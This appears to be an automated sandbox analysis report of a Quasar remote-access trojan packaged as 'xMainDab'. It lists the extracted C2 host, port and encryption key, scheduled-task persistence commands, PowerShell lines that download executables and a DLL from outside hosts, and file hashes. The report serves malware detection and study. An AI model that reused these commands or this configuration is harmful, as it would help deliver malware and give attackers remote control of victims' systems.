Analysis
-
max time kernel
112s -
max time network
109s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
03-06-2024 09:38
Static task
static1
URLScan task
urlscan1
General
Malware Config
Extracted
quasar
1.4.0.0
Office
espinyskibidi-40205.portmap.host:40205
CdrjrrWbtRopP1ic7E
-
encryption_key
P2ctPN6uGReD4W1dEypm
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Client
-
subdirectory
Microsoft
Signatures
-
Quasar payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\Downloads\Loader.exe family_quasar behavioral1/memory/5880-99-0x00000000006C0000-0x000000000070E000-memory.dmp family_quasar -
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exepowershell.exeflow pid process 70 1356 powershell.exe 72 1356 powershell.exe 96 6092 powershell.exe -
Processes:
powershell.exepowershell.exepid process 1356 powershell.exe 6092 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
MainDab.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation MainDab.exe -
Executes dropped EXE 4 IoCs
Processes:
Loader.exeClient.exeLoader.exeMainDab.exepid process 5880 Loader.exe 6120 Client.exe 5380 Loader.exe 5744 MainDab.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
flow ioc 71 raw.githubusercontent.com 72 raw.githubusercontent.com 88 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 62 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 6076 schtasks.exe 388 schtasks.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 1 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings msedge.exe -
Suspicious behavior: EnumeratesProcesses 24 IoCs
Processes:
msedge.exemsedge.exeidentity_helper.exemsedge.exepowershell.exepowershell.exeMainDab.exepid process 3984 msedge.exe 3984 msedge.exe 2528 msedge.exe 2528 msedge.exe 4308 identity_helper.exe 4308 identity_helper.exe 960 msedge.exe 960 msedge.exe 1356 powershell.exe 1356 powershell.exe 1356 powershell.exe 6092 powershell.exe 6092 powershell.exe 5744 MainDab.exe 5744 MainDab.exe 6092 powershell.exe 5744 MainDab.exe 5744 MainDab.exe 5744 MainDab.exe 5744 MainDab.exe 5744 MainDab.exe 5744 MainDab.exe 5744 MainDab.exe 5744 MainDab.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
Processes:
msedge.exepid process 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
7zG.exeLoader.exeClient.exepowershell.exeMainDab.exepowershell.exedescription pid process Token: SeRestorePrivilege 5540 7zG.exe Token: 35 5540 7zG.exe Token: SeSecurityPrivilege 5540 7zG.exe Token: SeSecurityPrivilege 5540 7zG.exe Token: SeDebugPrivilege 5880 Loader.exe Token: SeDebugPrivilege 6120 Client.exe Token: SeDebugPrivilege 1356 powershell.exe Token: SeDebugPrivilege 5744 MainDab.exe Token: SeDebugPrivilege 6092 powershell.exe -
Suspicious use of FindShellTrayWindow 34 IoCs
Processes:
msedge.exe7zG.exepid process 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 5540 7zG.exe -
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
msedge.exepid process 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe 2528 msedge.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
MainDab.exepid process 5744 MainDab.exe 5744 MainDab.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid process target process PID 2528 wrote to memory of 208 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 208 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1820 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1820 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1820 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1820 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1820 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1820 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1820 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1820 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1820 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1820 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1820 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1820 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1820 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1820 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1820 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1820 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1820 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1820 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1820 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1820 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1820 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1820 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1820 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1820 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1820 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1820 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1820 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1820 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1820 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1820 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1820 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1820 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1820 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1820 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1820 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1820 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1820 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1820 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1820 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1820 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 3984 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 3984 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1264 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1264 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1264 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1264 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1264 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1264 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1264 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1264 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1264 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1264 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1264 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1264 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1264 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1264 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1264 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1264 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1264 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1264 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1264 2528 msedge.exe msedge.exe PID 2528 wrote to memory of 1264 2528 msedge.exe msedge.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/cfedss/xMainDab/releases/download/101/xMainDab.rar1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe902246f8,0x7ffe90224708,0x7ffe902247182⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:22⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2448 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2872 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5376 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5376 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5244 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5432 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4728 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5780 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6128 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6124 /prefetch:12⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap9114:78:7zEvent143971⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\Downloads\Loader.exe"C:\Users\Admin\Downloads\Loader.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\Downloads\Loader.exe" /rl HIGHEST /f2⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\Install.cmd"1⤵
-
C:\Users\Admin\Downloads\Loader.exe"\Users\Admin\Downloads\Loader.exe"2⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -C ""Invoke-WebRequest -Uri 'https://github.com/Espiny/test/raw/main/MainDab.exe' -OutFile '\Users\Admin\Downloads\MainDab.exe'""2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Downloads\MainDab.exe"C:\Users\Admin\Downloads\MainDab.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C powershell -c Invoke-WebRequest -Uri 'https://k-storage.com/bootstrapper/files/krnl.dll' -OutFile 'C:\Users\Admin\Downloads\krnl.dll'2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -c Invoke-WebRequest -Uri 'https://k-storage.com/bootstrapper/files/krnl.dll' -OutFile 'C:\Users\Admin\Downloads\krnl.dll'3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\werfault.exewerfault.exe /h /shared Global\89f113f47ef541c4bddde32eaf69b391 /t 5752 /p 57441⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Loader.exe.logFilesize
1KB
MD510eab9c2684febb5327b6976f2047587
SHA1a12ed54146a7f5c4c580416aecb899549712449e
SHA256f49dbd55029bfbc15134f7c6a4f967d6c39142c63f2e8f1f8c78fab108a2c928
SHA5127e5fd90fffae723bd0c662a90e0730b507805f072771ee673d1d8c262dbf60c8a03ba5fe088f699a97c2e886380de158b2ccd59ee62e3d012dd6dd14ea9d0e50
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\6c232867-95b2-433e-9e37-a50130977164.tmpFilesize
11KB
MD57df0d4536dc467b1cfb50a3cb44bd1b4
SHA1d6abb808d2b78199a4b9488a982280179cc5170c
SHA256ccd7f11ec38bb4d81c4c8f4e5eb5e44c66fdad9c06596425dd4e8aca1c268633
SHA5120ab1a8b6b3bc9a289eb74e8acb4276a4b8e9bee19930bbed98e6ef7b1d4eb54ce0baba30483fc217938f17711216276245537a86d3260692f4bd3f40feded16e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5ce4c898f8fc7601e2fbc252fdadb5115
SHA101bf06badc5da353e539c7c07527d30dccc55a91
SHA256bce2dfaa91f0d44e977e0f79c60e64954a7b9dc828b0e30fbaa67dbe82f750aa
SHA51280fff4c722c8d3e69ec4f09510779b7e3518ae60725d2d36903e606a27ec1eaedbdbfac5b662bf2c19194c572ccf0125445f22a907b329ad256e6c00b9cf032c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD54158365912175436289496136e7912c2
SHA1813d11f772b1cfe9ceac2bf37f4f741e5e8fbe59
SHA256354de4b033ba6e4d85f94d91230cb8501f62e0a4e302cd4076c7e0ad73bedbd1
SHA51274b4f7b24ad4ea395f3a4cd8dbfae54f112a7c87bce3d286ee5161f6b63d62dfa19bb0d96bb7ed1c6d925f5697a2580c25023d5052c6a09992e6fd9dd49ea82b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
265B
MD5f5cd008cf465804d0e6f39a8d81f9a2d
SHA16b2907356472ed4a719e5675cc08969f30adc855
SHA256fcea95cc39dc6c2a925f5aed739dbedaa405ee4ce127f535fcf1c751b2b8fb5d
SHA512dc97034546a4c94bdaa6f644b5cfd1e477209de9a03a5b02a360c254a406c1d647d6f90860f385e27387b35631c41f0886cb543ede9116436941b9af6cd3285d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD57bd1712cc6d31bc1164612ee2a137927
SHA1ac1277b310f2529ff98093830473ce8921b629d6
SHA25640f8b364cd92dafc913d49a2c06425ef9f682c836d494d76ed2acaf3342fb6a2
SHA5125fe0cac7620c1fcbf6c6ae4e9c718a09be9f5e49e69908a342d05cdf6ea504f532e07791b1e8cb1af0c803bb5e89d64b80d048f97971d1a245045fa4d56b852d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD598c1f6f97a8388f5e53a46415379f994
SHA19b8cdcf7f680116431bc82bb3d12fe61e6b0e380
SHA256bc11c642451c748ca1cadc7dc63481c165b88556c8ea8b2d768a04e1213c3f94
SHA512df29990c8f034274c375458dc3c223072f9933b63fbfca561731d3672bc78f355dcaae8a8e4c7f46b6a0e881325987cc1809371b180925aa07e528e637026ae7
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD575ad9c9c81c535e17f4d5e01a7ed4edf
SHA1913d798cd9c36b8b3dfe1edba97b34607da1762b
SHA25652dc02f8c9346ad0d1e364897d8dae64eed73f3b719a9844294fd3ee17ef372d
SHA51212a83cd323cd3e06a41f6d9e49c8e675175b7e503d90087d1d09ace295a60556b98747ed910311fc1f87579c35762da3c2e2b40d3be561dc85a2c48b971fbe2d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5a2b24af1492f112d2e53cb7415fda39f
SHA1dbfcee57242a14b60997bd03379cc60198976d85
SHA256fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073
SHA5129919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2ajw53az.nhn.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\Downloads\Install.cmdFilesize
407B
MD5d605e519c8fb10ecc49055af63c0f213
SHA1a69b61879040aa541258035461260159ea51369a
SHA2561452be84cfc1ea5aee5db2011fe8e2a5b72ff2fe637b77696d720734f58eac89
SHA512304e8825d0afa6f7235859bb2083d728510d48806b06214225978592e8c4f8d065e1bcf3ca9eb39d4312b762a83e1054237d11cecbb3347ef4868bb4574b0e2b
-
C:\Users\Admin\Downloads\Loader.exeFilesize
286KB
MD54e47b6257fa7e2221df20e6d9f7fc47a
SHA17d6116a578f51d87cad1efe9e5971c412eb769a9
SHA256eeddf97a4c02250bdff26feba1085ff30277d2f71054cd32e8796554fffb23e6
SHA5126e5e3d2e865fa2c2d229c70f7a10a3821316b91b7daa66ecdfea9dcc7275d30da56f56a90eb64fdbe603e0aa50d5d797c40a4877e48ab0328a6d6ebc06ddd532
-
C:\Users\Admin\Downloads\MainDab.exeFilesize
3.4MB
MD561c8fbae47137392a395793c6389a7c3
SHA1a5830825fdf83ebc0c3c71efa08f930ef28c1bac
SHA2564e5eecfa5d74032e0e84be4735741c3c1487419de546904b1812bbbcdbe40d3d
SHA51262205d56d2b8672663a903273f1e11af1e4d8c53a8511247d23d7669de7724a7a5e1d12a182f48e829608ed333f395f185a82758e1ddafb5b9a695b86a7c13e1
-
C:\Users\Admin\Downloads\xMainDab.rarFilesize
110KB
MD5da3cd4f40dbda9603d615420f1f03abf
SHA16536f4b774c84e94c449f2893adc5f53ecfe5ccb
SHA2562d69da9d85e385e410a5934b936037add1b249396a3b21a1567e87770194197a
SHA51201d40ab409fa3132412fa6bcf3e2c05cd0fa5b4b09a2e7ddb1a42e3900627b447501575c75be41ca8ed2ffb47e2a01856182a95dac947a5dfa7e2c847a26d2e4
-
\??\pipe\LOCAL\crashpad_2528_GDHDCMYDBFNAACLJMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/1356-115-0x000002189D5A0000-0x000002189D5C2000-memory.dmpFilesize
136KB
-
memory/5744-175-0x0000000007EB0000-0x0000000007ECA000-memory.dmpFilesize
104KB
-
memory/5744-169-0x0000000006C10000-0x0000000006C1E000-memory.dmpFilesize
56KB
-
memory/5744-184-0x000000000F3E0000-0x000000000F430000-memory.dmpFilesize
320KB
-
memory/5744-174-0x0000000007BE0000-0x0000000007BFE000-memory.dmpFilesize
120KB
-
memory/5744-173-0x000000000C5A0000-0x000000000C616000-memory.dmpFilesize
472KB
-
memory/5744-168-0x0000000006C40000-0x0000000006C78000-memory.dmpFilesize
224KB
-
memory/5744-161-0x0000000000DC0000-0x0000000001136000-memory.dmpFilesize
3.5MB
-
memory/5744-162-0x0000000005880000-0x0000000005888000-memory.dmpFilesize
32KB
-
memory/5744-163-0x0000000005B50000-0x0000000005BEE000-memory.dmpFilesize
632KB
-
memory/5744-165-0x0000000007880000-0x000000000792A000-memory.dmpFilesize
680KB
-
memory/5744-166-0x00000000079A0000-0x00000000079C2000-memory.dmpFilesize
136KB
-
memory/5744-167-0x0000000006BF0000-0x0000000006BF8000-memory.dmpFilesize
32KB
-
memory/5880-101-0x00000000050D0000-0x0000000005162000-memory.dmpFilesize
584KB
-
memory/5880-99-0x00000000006C0000-0x000000000070E000-memory.dmpFilesize
312KB
-
memory/5880-102-0x0000000005180000-0x00000000051E6000-memory.dmpFilesize
408KB
-
memory/5880-103-0x0000000005DE0000-0x0000000005DF2000-memory.dmpFilesize
72KB
-
memory/5880-100-0x0000000005730000-0x0000000005CD4000-memory.dmpFilesize
5.6MB
-
memory/5880-104-0x0000000006360000-0x000000000639C000-memory.dmpFilesize
240KB
-
memory/6092-183-0x0000000005160000-0x0000000005788000-memory.dmpFilesize
6.2MB
-
